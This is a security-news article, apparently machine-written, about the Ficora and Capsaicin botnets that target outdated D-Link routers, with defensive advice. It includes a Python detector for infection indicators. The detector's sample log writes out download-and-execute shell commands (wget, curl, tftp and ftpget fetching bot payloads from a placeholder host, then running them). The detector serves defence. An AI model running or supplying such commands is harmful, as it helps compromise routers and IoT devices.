

Ethical Hacking News

The Growing Threat of Malware Botnets: A Closer Look at Ficora and Capsaicin



Malware botnets are becoming increasingly sophisticated, with recent attacks targeting outdated D-Link routers to gain access to sensitive information and execute malicious commands. In this article, we'll delve into the details of two such botnets, Ficora and Capsaicin, and explore how they exploit vulnerabilities in D-Link devices to carry out their nefarious activities.

  • Ficora and Capsaicin are two recent malware botnet variants targeting devices with outdated firmware or end-of-life versions.
  • The Ficora botnet exploits D-Link device vulnerabilities, supporting UDP flooding, TCP flooding, DNS amplification, and stealing data.
  • Capsaicin is believed to be developed by the Keksec group, using a downloader script and gathering host information for exfiltration.
  • Defending against these botnets involves ensuring latest firmware versions, replacing end-of-life devices, or using open source firmware like OpenWRT.



Malware botnets have long been a concern for cybersecurity experts, with their ability to compromise large numbers of devices and execute malicious commands making them a formidable threat. In recent times, however, we've seen a rise in the sophistication of these botnets, with attackers leveraging vulnerabilities in outdated D-Link routers to gain access to sensitive information and carry out their nefarious activities.

According to Bill Toulas, a tech writer and infosec news reporter, two such botnets have been making headlines recently. Ficora and Capsaicin are the names of these malicious entities, and they're targeting devices running outdated firmware versions or those that have reached end-of-life. In this article, we'll take a closer look at how these botnets exploit vulnerabilities in D-Link devices to carry out their attacks.

Ficora is a variant of the Mirai botnet, adapted to exploit flaws in D-Link devices specifically. This new variant has shown random targeting, with notable surges in activity during October and November. Its infection chain uses a shell script named 'multi' that downloads and executes the bot payload through multiple methods, such as wget, curl, ftpget, and tftp. The malware also features a built-in brute-force component with hard-coded credentials to infect additional Linux-based devices.

The Ficora botnet's DDoS capabilities are quite impressive, supporting UDP flooding, TCP flooding, and DNS amplification to maximize the power of its attacks. Its ability to steal data and execute shell scripts makes it a formidable force in the world of malware.

On the other hand, Capsaicin is believed to be malware developed by the Keksec group, known for 'EnemyBot' and other malware families targeting Linux devices. This botnet has been observed in a burst of attacks between October 21 and 22, primarily targeting East Asian countries. The infection occurs through a downloader script ("bins.sh"), which fetches binaries with the prefix 'yakuza' for different architectures, including arm, mips, sparc, and x86.

The Capsaicin botnet actively looks for other botnet payloads that are active on the same host and disables them. Apart from its DDoS capabilities, which mirror those of Ficora, Capsaicin can also gather host information and exfiltrate it to the command and control (C2) server for tracking.
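The two infection chains described above (the 'multi' script fetched via wget, curl, ftpget or tftp, and the 'bins.sh' downloader pulling 'yakuza'-prefixed binaries per architecture) give a defender concrete strings to hunt for in router or honeypot command logs. The following detector is an added example, not code from the article or from either botnet; the log lines it scans are constructed for the example and the hosts in them are placeholders.

```python
"""Flag shell-command log lines that match the download patterns the
article attributes to Ficora and Capsaicin.  Sample log lines below
are constructed; PLACEHOLDER stands in for any host."""
import re

# Download tools the article names for Ficora's 'multi' script
DOWNLOADERS = ("wget", "curl", "ftpget", "tftp")
# Architectures the article lists for Capsaicin's 'yakuza' binaries
ARCHES = ("arm", "mips", "sparc", "x86")

DOWNLOADER_RE = re.compile(r"\b(" + "|".join(DOWNLOADERS) + r")\b")
MULTI_RE = re.compile(r"(?:^|[\s/])multi(?:\s|$|;)")
BINS_RE = re.compile(r"(?:^|[\s/])bins\.sh(?:\s|$|;)")
YAKUZA_RE = re.compile(r"\byakuza[._-]?(" + "|".join(ARCHES) + r")\b")

def classify(command: str) -> list[str]:
    """Return the indicator tags that fire on one shell command line."""
    tags = []
    tools = set(DOWNLOADER_RE.findall(command))
    if tools and MULTI_RE.search(command):
        tags.append("ficora:multi-download")
    if BINS_RE.search(command):
        tags.append("capsaicin:bins.sh")
    m = YAKUZA_RE.search(command)
    if m:
        tags.append(f"capsaicin:yakuza-{m.group(1)}")
    # One line falling back through several fetch tools is itself a signal
    if len(tools) >= 2:
        tags.append("multi-fetch-fallback")
    return tags

def scan(log_lines):
    """Yield (line, tags) for every line that matches at least one indicator."""
    for line in log_lines:
        tags = classify(line)
        if tags:
            yield line, tags

# Constructed lines in the style of a telnet/SSH honeypot command log
SAMPLE_LOG = [
    "cd /tmp; wget http://PLACEHOLDER/multi || curl -O http://PLACEHOLDER/multi; chmod +x multi; ./multi",
    "tftp -g -r multi PLACEHOLDER; ftpget -u anonymous PLACEHOLDER multi multi",
    "cd /tmp && wget http://PLACEHOLDER/bins.sh -O bins.sh && sh bins.sh",
    "wget http://PLACEHOLDER/yakuza.mips -O /tmp/y; chmod 777 /tmp/y; /tmp/y",
    "uptime; cat /proc/cpuinfo | head -n 5",
]

def alerts(log_lines=SAMPLE_LOG):
    return list(scan(log_lines))

if __name__ == "__main__":
    for line, tags in alerts():
        print(tags, "<-", line)
```

Feed it real command logs from a Cowrie-style honeypot or a router's shell audit trail; the benign fifth line shows that ordinary enumeration produces no tag.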

Defending against these botnets requires some proactive steps. One way to prevent botnet malware infections on routers and IoT devices is to ensure that they're running the latest firmware version, which should address known vulnerabilities. If the device has reached end-of-life and no longer receives security updates, it's recommended to replace it with a new model.

Another alternative is to check if your device is supported by open source firmware such as OpenWRT. This can provide an added layer of security against botnet attacks.

In conclusion, Ficora and Capsaicin are just two examples of the sophisticated malware botnets that are becoming increasingly prevalent in today's digital landscape. By taking proactive steps to secure our devices and stay informed about emerging threats, we can mitigate the risks associated with these malicious entities.

Related Information:

  • https://www.bleepingcomputer.com/news/security/malware-botnets-exploit-outdated-d-link-routers-in-recent-attacks/

  • https://thehackernews.com/2024/12/ficora-and-kaiten-botnets-exploit-old-d.html


  • Published: Mon Dec 30 01:50:19 2024 by llama3.2 3B Q4_K_M


© Ethical Hacking News. All rights reserved.